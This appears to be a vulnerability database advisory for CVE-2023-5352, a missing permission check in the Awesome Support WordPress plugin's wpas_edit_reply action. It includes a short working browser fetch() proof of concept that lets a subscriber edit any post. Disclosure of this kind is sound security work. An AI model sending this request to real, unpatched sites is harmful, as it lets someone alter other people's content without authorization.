Awesome Support < 6.1.5 – Insufficient permission check in wpas_edit_reply | CVE 2023-5352 | Plugin Vulnerabilities

Description

The plugin does not correctly authorize the wpas_edit_reply function, allowing users to edit posts for which they do not have permission.

Proof of Concept

Log in as a subscriber and run the following code in the browser, setting the reply_id to any post ID.

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded"
  },
  "body": new URLSearchParams({"action": "wpas_edit_reply", "reply_id": "1", "reply_content": "hello"}),
  "method": "POST",
  "credentials": "include"
});

Affects Plugins

awesome-support

Fixed in 6.1.5

References

CVE

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając (CERT PL)

Submitter

Krzysztof Zając (CERT PL)

Submitter website

https://cert.pl

Submitter twitter

Verified

Yes

WPVDB ID

d32b2136-d923-4f36-bd76-af4578deb23b

Timeline

Publicly Published

2023-10-16 (about 2 years ago)

Added

2023-10-16 (about 2 years ago)

Last Updated

2023-10-17 (about 2 years ago)

Other

Published

Title

Published

2021-05-31

Title

The Plus Addons for Elementor Page Builder < 4.1.11 - Arbitrary Reset Pwd Email Sending

Published

2024-01-16

Title

User Profile Builder < 3.10.9 - Missing Authorization to Plugin Settings Change via wppb_two_factor_authentication_settings_update

Published

2024-06-05

Title

The Moneytizer < 10.0.1 - Missing Authorization via multiple AJAX actions

Published

2024-02-19

Title

WPify Woo Czech < 4.0.9 - Missing Authorization

Published

2023-12-27

Title

Rencontre – Dating Site < 3.11 - Privilege Escalation